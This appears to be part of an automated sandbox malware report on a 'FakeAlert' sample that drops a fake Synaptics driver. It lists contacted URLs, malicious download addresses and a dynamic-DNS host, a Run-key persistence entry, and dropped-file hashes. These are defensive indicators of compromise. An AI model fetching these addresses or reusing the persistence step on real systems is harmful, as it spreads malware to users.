                                https://api.aadrm.com0%URL Reputationsafe
                                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                                https://www.odwebp.svc.ms0%URL Reputationsafe
                                http://xred.site50.net/syn/Synaptics.rar0%Avira URL Cloudsafe
                                https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                                https://dataservice.o365filtering.com/0%URL Reputationsafe
                                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                                https://ncus.contentsync.0%URL Reputationsafe
                                https://apis.live.net/v5.0/0%URL Reputationsafe
                                http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                https://wus2.contentsync.0%URL Reputationsafe
                                http://xred.site50.net/syn/Synaptics.rarZ0%Avira URL Cloudsafe
                                https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                                http://2.58.149.33/ominz_QLUnxlrvVz46.bin0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		172.217.168.14
                                  		truefalse
                                    		high
                                    xred.mooo.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high
                                        http://2.58.149.33/ominz_QLUnxlrvVz46.bintrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://api.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                          		high
                                          https://login.microsoftonline.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                            		high
                                            https://shell.suite.office.com:144376A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                              		high
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1RCXDA77.tmp.9.drfalse
                                                		high
                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                  		high
                                                  http://xred.site50.net/syn/SSLLibrary.dlXuniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://autodiscover-s.outlook.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                    		high
                                                    https://roaming.edog.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                      		high
                                                      https://cdn.entity.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.addins.omex.office.net/appinfo/query76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                        		high
                                                        https://clients.config.office.net/user/v1.0/tenantassociationkey76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            		high
                                                            https://powerlift.acompli.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://rpsticket.partnerservices.getmicrosoftkey.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://lookup.onenote.com/lookup/geolocation/v176A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                              		high
                                                              https://cortana.ai76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                		high
                                                                https://cloudfiles.onenote.com/upload.aspx76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                  		high
                                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                    		high
                                                                    https://entitlement.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                      		high
                                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        		high
                                                                        https://api.aadrm.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://ofcrecsvcapi-int.azurewebsites.net/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SUpdate.iniRCXDA77.tmp.9.drfalse
                                                                          • 3%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://api.microsoftstream.com/api/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                            		high
                                                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                              		high
                                                                              https://cr.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                		high
                                                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://portal.office.com/account/?ref=ClientMeControl76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                  		high
                                                                                  https://graph.ppe.windows.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    		high
                                                                                    https://res.getmicrosoftkey.com/api/redemptionevents76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://powerlift-frontdesk.acompli.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://tasks.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                      		high
                                                                                      https://officeci.azurewebsites.net/api/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                        		high
                                                                                        https://store.office.cn/addinstemplate76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://docs.google.com/drSynaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.aadrm.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                            		high
                                                                                            https://globaldisco.crm.dynamics.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                              		high
                                                                                              https://messaging.engagement.office.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                		high
                                                                                                https://docs.google.com/0Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                    		high
                                                                                                    https://dev0-api.acompli.net/autodetect76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.odwebp.svc.ms76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://xred.site50.net/syn/Synaptics.rarRCXDA77.tmp.9.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://api.diagnosticssdf.office.com/v2/feedback76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                        		high
                                                                                                        https://api.powerbi.com/v1.0/myorg/groups76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                          		high
                                                                                                          https://web.microsoftstream.com/video/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                            		high
                                                                                                            http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.drfalse
                                                                                                              		high
                                                                                                              https://api.addins.store.officeppe.com/addinstemplate76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://graph.windows.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                		high
                                                                                                                https://dataservice.o365filtering.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://officesetup.getmicrosoftkey.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://analysis.windows.net/powerbi/api76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  		high
                                                                                                                  https://prod-global-autodetect.acompli.net/autodetect76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                    		high
                                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCXDA77.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                        		high
                                                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                          		high
                                                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            		high
                                                                                                                            https://ncus.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                              		high
                                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                		high
                                                                                                                                http://weather.service.msn.com/data.aspx76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://apis.live.net/v5.0/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                    		high
                                                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                      		high
                                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllRCXDA77.tmp.9.drtrue
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                        		high
                                                                                                                                        https://management.azure.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.office365.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            		high
                                                                                                                                            https://wus2.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://incidents.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                              		high
                                                                                                                                              https://clients.config.office.net/user/v1.0/ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                		high
                                                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlluniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://api.office.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://incidents.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://asgsmsproxyapi.azurewebsites.net/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/android/policies76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://entitlement.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v2/init76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://outlook.office.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://storage.live.com/clientlogs/uploadlocation76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://outlook.office365.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://webshell.suite.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://management.azure.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  172.217.168.14
                                                                                                                                                                                  		docs.google.comUnited States
                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                  69.42.215.252
                                                                                                                                                                                  		freedns.afraid.orgUnited States
                                                                                                                                                                                  		17048AWKNET-LLCUSfalse

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                  Analysis ID:634939
                                                                                                                                                                                  Start date and time: 27/05/202204:36:302022-05-27 04:36:30 +02:00
                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 11m 39s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:light
                                                                                                                                                                                  Sample file name:SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@21/60@6/2
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                  • Successful, ratio: 99.4% (good quality ratio 97.1%)
                                                                                                                                                                                  • Quality average: 82.8%
                                                                                                                                                                                  • Quality standard deviation: 25%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 90%
                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                  • Enable AMSI

                                                                                                                                                                                  Warnings

                                                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.24, 52.109.12.23, 13.89.179.12
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  04:37:46API Interceptor58x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  04:37:50API Interceptor1x Sleep call for process: ._cache_uniformerede.exe modified
                                                                                                                                                                                  04:37:53AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  04:38:12API Interceptor78x Sleep call for process: Synaptics.exe modified
                                                                                                                                                                                  04:38:47API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  No context

                                                                                                                                                                                  Domains

                                                                                                                                                                                  No context

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  No context

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_a5c396d0e6d651f539cd1b6dccb863d9c272052_455b7b6e_18c9b0c2\Report.wer

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                  Entropy (8bit):1.1219130372828425
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:iQdUUyxVpsQmFHNVj8DzJDzqjut6aLAltU/u7suS274ItdKDzy:BX4yHNVj8JqjJc/u7suX4Itoy
                                                                                                                                                                                  MD5:003F3B5C61F927CD9B787EFC85CFD128
                                                                                                                                                                                  SHA1:AFACE7575FBA9BE51D3A0EF7798E5E0CEAC71ADF
                                                                                                                                                                                  SHA-256:CA2610FD60A185204D451E31D3A08CDC179FF690028244A0AB351012A3A8F2A6
                                                                                                                                                                                  SHA-512:EC770C5CF91DCF291FD6CE7CC68706B6FA65E742C38A30C40C6365A36C62DF6CACB69F6803591ADA0E43553F3E4710BD51597CBA9158968658FF349D871221F3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.1.2.5.1.1.7.5.1.0.4.8.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.1.2.5.1.2.5.8.0.7.7.7.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.f.9.1.e.2.5.-.f.5.e.2.-.4.f.2.7.-.a.f.a.4.-.d.6.f.b.5.0.d.3.1.0.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.2.e.6.c.d.5.-.0.8.9.8.-.4.9.5.c.-.8.a.4.a.-.2.7.4.9.5.9.b.6.3.d.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.c.-.0.0.0.1.-.0.0.1.d.-.6.6.d.a.-.3.6.3.2.b.e.7.1.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.1.e.3.8.6.6.4.0.1.e.c.a.2.2.9.8.1.f.9.8.5.c.1.7.c.b.4.c.d.9.c.3.6.f.8.5.4.8.6.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B2.tmp.dmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri May 27 11:38:39 2022, 0x1205a4 type
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1808260
                                                                                                                                                                                  Entropy (8bit):2.0410087371425427
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:j/o7nWuYmkgEWOal8CjyCRz6v792U+0NPCv78dQA2A80yYC18gB174gZ+A2EN6z2:s7W1+EOqA2EszEjkgdvq0Izo
                                                                                                                                                                                  MD5:AE218CDBEA668F0A4ECA0E0CEEADF10D
                                                                                                                                                                                  SHA1:734CE669A774BF48825A22E9BD1DCC39B8A925D9
                                                                                                                                                                                  SHA-256:690770416AE3260176AD1AE53068D1482BD614DD03F3BF268D0918ACDF924B1D
                                                                                                                                                                                  SHA-512:6FAC3C611C885FEAA0E326DBF80C92099B7F9500BBDAF301E334287B065374B4210661B832A6A46F0D559E4FAA40869242F73D60AB0565CB4DB47B46C5BAC2B5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MDMP....... .......?..b........................<...........$....6...........;..........`.......8...........T...........................6...........8...................................................................U...........B......|9......GenuineIntelW...........T..............b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA317.tmp.WERInternalMetadata.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6304
                                                                                                                                                                                  Entropy (8bit):3.7160926141417865
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Rrl7r3GLNiFxgo6YRpzYiSySZCprj89bzfsfZZRm:RrlsNiko6YbYaS1zEfc
                                                                                                                                                                                  MD5:163948AFB76DB7C6562534638BF5F9F3
                                                                                                                                                                                  SHA1:D28346E8ED8F5DDE8D1A67B95EC925AF83116547
                                                                                                                                                                                  SHA-256:BA59DDBA3876E93D552AAAC43848866ABA08049FA9A7D1A336237026B638B078
                                                                                                                                                                                  SHA-512:484F5C7D2E1633CF1E6B3296550E06DCC42D62FE4A9AF3C0571E85FCC80B1F2F488F6CA91C1A9C30510B63B72403078CD600FE6C66DF3FA01B973BF1EFF1C594
                                                                                                                                                                                  Malicious:false
